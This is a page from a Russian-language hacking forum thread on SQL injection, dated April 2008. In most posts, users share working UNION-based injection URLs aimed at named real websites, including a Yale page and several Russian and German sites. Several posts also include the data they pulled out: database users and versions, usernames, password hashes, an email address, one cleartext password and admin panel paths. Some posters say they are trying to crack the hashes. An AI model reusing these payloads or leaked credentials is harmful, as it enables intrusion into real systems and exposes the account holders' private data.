HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 535 из 1604 « Первая < 35435485525 531 532 533 534 535 536 537 538 539 54558563510351535 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5341  
Старый 21.04.2008, 18:03
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию
Интернет телевидение
http://tv-portal.ru/index.php?kanal=-57+UNION+SELECT+1,2,concat(id,0x3a,name,0x3a,pass) ,database(),5,user(),7,8,9,10,version()+from+users +limit+1,1/*
database - dbu_kokos32_1@192.168.3.23
user - db_kokos32_2
version - 4.1.21-log

меняем limit+1(2,3,4...),1/* получаем ИД,Имя,Пароль
 
Ответить с цитированием

  #5342  
Старый 21.04.2008, 20:03
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами: 10692326

Репутация: 531


По умолчанию
2-=megahertz=- только хз куда эти логины и пассы= )
там авторизаций ничего нету =) а в админку пассы не подходят
 
Ответить с цитированием

  #5343  
Старый 21.04.2008, 20:48
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию
NFm попробуй подбери другую таблицу... я кроме юзерс ничего не искал...
 
Ответить с цитированием

  #5344  
Старый 21.04.2008, 22:34
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию
Код:
ht_tp://uskniedernsill.us.funpic.de/AllMyGuests0.4.1/index.php?AMG_open=comments&AMG_id=111%20UNION+SELECT+1,2,3,%20concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
stefanhofer : e8cd3fd55a1f0100bb692431c649844c :fc_niedernsill@yahoo.de
Пробую вскрыть хэш!!!
Последний раз редактировалось kair; 21.04.2008 в 22:42..
 
Ответить с цитированием

  #5345  
Старый 22.04.2008, 04:23
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию
http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,concat_w s(0x2f,version(),database(),user()),3,4,5,6,7,8,9, 10,11,12,13,14,15,id,17,18,20,21,22,23,24,25+from+ users+limit+1,1/*
version() : 4.0.24-log database():rwj user(): rwjEditor@web.med.yale.edu

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,password ,3,4,5,6,7,8,9,10,11,12,13,14,15,id,17,18,20,21,22 ,23,24,25+from+users+limit+1,1/*




http://www.moscowbooks.ru/news/view.asp?id=-1+or+1=@@version--
Последний раз редактировалось AkyHa_MaTaTa; 22.04.2008 в 06:20..
 
Ответить с цитированием

  #5346  
Старый 22.04.2008, 12:18
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами: 10636106

Репутация: 705
По умолчанию
http://www.preproject.com/news%20manager/admin/view_news.php?catid=[sql]
Цитата:
-1+union+select+1,2,3,concat_ws(%22:%22,id,login,pa ssword),5,6,7+from+admin/*
http://www.preproject.com/news%20manager/index.php?id=[sql]
Цитата:
-1+union+select+1,2,3,4,concat_ws(%22:%22,id,login, password),6,7+from+admin/*
ps скуля в демо двиге!
 
Ответить с цитированием

  #5347  
Старый 22.04.2008, 19:16
symbioin
Познающий
Регистрация: 06.08.2007
Сообщений: 84
С нами: 9876447

Репутация: 25
По умолчанию
http://auction.ua/auctions/one.htm?parent=-3242
 
Ответить с цитированием

  #5348  
Старый 22.04.2008, 19:51
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию
Цитата:
http://www.mognet.net/projectinfo.php?id=-29+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use rname,user_password),0,1+from+mognetforum.phpbb_us ers/*
http://www.mognet.net/projectinfo.php?id=-29+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,adm inlogin,admin,username,password),0,1+from+projectq ueue.user/*
Kumama:04f83a9025d99b309b427d9bde172fb7
Stiltzkin:4e25f9875fd790f28dfc8e97da43aece:SailorV8
mognet.net/admin
mognet.net/forum/admin
 
Ответить с цитированием

  #5349  
Старый 22.04.2008, 21:32
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами: 9740547

Репутация: 93
По умолчанию
Цитата:
http://www.tkastrey.ru/brand.php?id=-1+union+select+1,2,3,4,concat(user,0x3,password)+f rom+mysql.user--
user: site@zvm11.host.ru
db: astrey
version: 4.0.27

root0bcb2a3b366d4f3c
site5187d56e009fb910

Хэши не сбручены, но поставлены в очередь на hashcracking.info
 
Ответить с цитированием

  #5350  
Старый 22.04.2008, 22:37
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Код:
http://www.itsecurityportal.com/itsecurity_directory.asp?SearchString=a%')+and+1=@@version--
Код:
http://www.itsecurityportal.com/itsecurity_job_detail.asp?jobid=111+and+1=@@version
на серве несколько сайтов, все они узявимы в этих сриптах, единственное что, это меняется самый первый префикс, в зависимости от имени сайта
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ
Страница 535 из 1604 « Первая < 35435485525 531 532 533 534 535 536 537 538 539 54558563510351535 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.